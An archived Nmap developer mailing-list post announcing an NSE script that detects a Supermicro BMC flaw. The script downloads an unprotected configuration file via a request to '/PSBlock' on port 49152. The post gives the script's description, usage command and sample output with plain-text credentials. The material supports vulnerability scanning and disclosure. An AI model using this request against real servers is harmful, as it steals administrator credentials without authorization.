Nmap Development mailing list archives
Re: NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products
From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 17 Aug 2014 21:18:39 -0500
Hi everyone, I committed this in r33546 and r33547. The vulnerability got nominated for a Pwnie for Best Server-Side Bug at BH this year and apparently there are still a lot of exposed servers. Cheers. On Jun 20, 2014, at 4:47 AM, Paulino Calderon <paulino () calderonpale com> wrote:
Hi list, I’m attaching a NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between products and versions so I left the credential parser out for now. Cheers. Download script: https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse description = [[ Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro BMC products. The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains all users with their passwords in plain text form. References: * http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/ * https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi ]] --- -- @usage nmap -p49152 --script bmc-supermicro-conf <target> -- -- @output -- PORT STATE SERVICE REASON -- 49152/tcp open unknown syn-ack -- | bmc-supermicro-conf: -- | VULNERABLE: -- | Supermicro BMC configuration file disclosure -- | State: VULNERABLE (Exploitable) -- | Description: -- | Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows attackers to download -- | a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the -- | network's Active Directory. -- | Disclosure date: 2014-06-19 -- | Extra information: -- | Snippet from configuration file: -- | .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14............. -- | Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf' -- | -- | References: -- |_ http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/ -- -- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf --- <bmc-supermicro-conf.nse>
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products Paulino Calderon (Aug 17)